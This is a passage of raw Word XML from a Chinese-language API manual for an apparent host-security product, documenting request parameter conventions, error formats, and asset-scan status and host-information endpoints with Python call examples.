        <w:t xml:space="preserve">    data = {'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '5b83764c7d761b72e19e38b6'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/execute" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7396DF21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc115166082"/>
      <w:bookmarkStart w:id="16" w:name="通用get请求参数类型及说明"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t>通用Get请求参数类型及说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7DFAFBEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DateRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 表示请求时间范围，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yyyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-MM-dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HH:mm:ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yyyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-MM-dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HH:mm:ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 前后用“ - ”(注意前后续的空格)分割为start和end，end部分可以省略，省略后表示到现在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FDEE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Date：时间，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yyyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-MM-dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HH:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mm:ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30375774" w14:textId="778E075D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>多值参数表示：通过逗号分割，如</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK "http://www.example.org/group=1,2,3" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>http://www.example.org/group=1,2,3</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622C991" w14:textId="1EBD6184" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>请求参数分页：page页码，从0开始；size每页条数；sorts:”+field1,-field2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,正序省略，倒序使用-号前缀，如</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK "http://example.org/hosts?page=0&amp;size=50&amp;sorts=ip,-desc" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>http://example.org/hosts?page=0&amp;size=50&amp;sorts=ip,-desc</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BA402" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc115166083"/>
      <w:bookmarkStart w:id="18" w:name="数据api请求结果"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>数据</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>请求结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="60EF9C85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>所有接口通过http status=200来判断接口调用是否成功，如果http status != 200 会有如下输出，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>为错误详情。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>接口异常返回数据格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63547235" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 401,   //      错误码，含义与标准</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的status一致</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE3791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc115166084"/>
      <w:bookmarkStart w:id="20" w:name="资产清点"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>资产清点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6B96871F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc115166085"/>
      <w:bookmarkStart w:id="22" w:name="资产通用查询扫描状态"/>
      <w:r>
        <w:t>资产通用查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="08CA9B1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询资产信息的扫描状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD5BE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABD236" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>refreshjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC2FEC"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3412"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F3E3D5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2B71D17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E3E992" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43848DBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C58BE6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C3F67E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D408FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62694A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程信息扫描接口返回的扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="738DD6A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23709F1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294B1F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B29F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>id: "some job id",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>status: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904CFA7"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1333"/>
        <w:gridCol w:w="3172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="24C4FF7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89F0FFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693519F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35326715" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A9739B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C1B80CF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348A33C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F048AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012125B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FAF88AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DA32577" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0629657C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D27092E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D982052" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301CD84F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描的状态（进行中/成功/失败）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56E12D1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果请求的任务ID 不存在，则返回404，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C4DB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 404,   //      错误码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "数据不存在", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DFDFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>资产信息的扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E556F3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#linux启动项信息扫描更新数据的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#资产信息的扫描状态接口调用</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>refresh_job</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>job_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(result).get('id')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>refreshjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/%s" % (host, port, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>job_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E991DBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc115166086"/>
      <w:bookmarkStart w:id="24" w:name="主机信息"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:t>主机信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="33171735" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E21889" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该功能API用于查询资产中的主机信息，获取查询的结果并展示；您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D3EFCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A34F81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>主机信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E055F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90CA93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B86B07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
